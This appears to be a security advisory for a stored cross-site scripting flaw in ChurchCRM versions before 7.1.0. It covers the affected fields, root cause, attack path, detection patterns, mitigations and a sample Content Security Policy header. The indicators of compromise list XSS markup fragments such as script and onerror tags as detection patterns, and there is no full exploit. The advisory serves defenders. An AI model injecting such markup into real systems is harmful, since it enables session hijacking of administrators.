CVE-2026-39336: ChurchCRM Stored XSS Vulnerability

CVE-2026-39336 Overview

ChurchCRM is an open-source church management system used by religious organizations to manage members, donations, and events. CVE-2026-39336 is a stored cross-site scripting (XSS) vulnerability [CWE-79] affecting versions prior to 7.1.0. The flaw resides in the Directory Reports form fields populated from configuration, Person editor defaults rendered into address fields, and external self-registration form defaults. An authenticated administrator can inject malicious JavaScript into writable configuration fields. The payload executes when other administrators or users render the affected views. The maintainers released ChurchCRM 7.1.0 to remediate the issue.

Critical Impact
An authenticated administrator can store JavaScript payloads in configuration-backed fields, leading to admin-to-admin session compromise and unauthorized actions in the ChurchCRM interface.

Affected Products

ChurchCRM versions prior to 7.1.0
Directory Reports module (configurable form fields)
Person editor and external self-registration form defaults

Discovery Timeline

2026-04-07 - CVE-2026-39336 published to NVD
2026-04-10 - Last updated in NVD database

Technical Details for CVE-2026-39336

Vulnerability Analysis

The vulnerability is a stored XSS issue rooted in improper neutralization of input during web page generation. ChurchCRM accepts administrator-controlled configuration values and renders them into HTML contexts without adequate output encoding. Three rendering paths are affected: Directory Reports form fields driven by configuration, Person editor defaults that populate address fields, and external self-registration form defaults. Because the malicious data persists in configuration storage, the payload executes for every user who later loads the affected forms or reports. The advisory describes this as primarily an admin-to-admin attack path, since writing the offending configuration values requires elevated privileges.

Root Cause

The root cause is missing or insufficient HTML output encoding on configuration-derived values that flow into rendered templates. Trust placed in admin-supplied configuration data allowed raw markup to reach the browser context, where it is parsed and executed as script.

Attack Vector

Exploitation requires an authenticated user with privileges to modify configuration entries. The attacker stores a JavaScript payload in a writable configuration field consumed by Directory Reports, the Person editor, or the self-registration form defaults. When another administrator opens the affected view, the script runs in their authenticated session. User interaction is required to trigger the payload, but no additional authentication challenge occurs. Refer to the ChurchCRM GitHub Security Advisory GHSA-r8cp-gg58-2r2r for technical details.

Detection Methods for CVE-2026-39336

Indicators of Compromise

Configuration entries containing HTML tags such as <script>, <img onerror=, or <svg onload= in fields consumed by Directory Reports or Person editor defaults.
Unexpected outbound requests from administrator browsers shortly after rendering directory or registration forms.
Audit log entries showing configuration changes by accounts that do not normally modify settings.

Detection Strategies

Scan the ChurchCRM configuration table for stored values containing HTML or JavaScript syntax in Directory Reports and registration-related keys.
Inspect rendered HTML of the Directory Reports, Person editor, and self-registration pages for unencoded markup originating from configuration values.
Review web server access logs for sequential requests where a configuration update is followed by repeated views of the affected forms.

Monitoring Recommendations

Alert on changes to ChurchCRM configuration tables by administrator accounts outside maintenance windows.
Monitor browser-side errors and Content Security Policy violations on administrator workstations accessing ChurchCRM.
Track creation of new admin sessions or password resets following access to vulnerable views.

How to Mitigate CVE-2026-39336

Immediate Actions Required

Upgrade ChurchCRM to version 7.1.0 or later, which contains the official fix.
Audit current configuration values for unexpected HTML or script content and sanitize any suspicious entries.
Rotate administrator credentials and invalidate active sessions if tampered configuration data is found.
Restrict administrator account access to trusted personnel and enforce multi-factor authentication.

Patch Information

The maintainers fixed the vulnerability in ChurchCRM 7.1.0. Review the ChurchCRM GitHub Security Advisory GHSA-r8cp-gg58-2r2r for upgrade instructions and the specific commits that introduce output encoding on the affected fields.

Workarounds

Limit administrative access to a minimum set of trusted users until the upgrade is applied.
Apply a strict Content Security Policy that disallows inline script execution in the ChurchCRM web context.
Place ChurchCRM behind a web application firewall with rules that block HTML and script tokens in configuration update requests.

bash

# Example Content Security Policy header to mitigate inline script execution
Header set Content-Security-Policy "default-src 'self'; script-src 'self'; object-src 'none'; base-uri 'self'; frame-ancestors 'self'"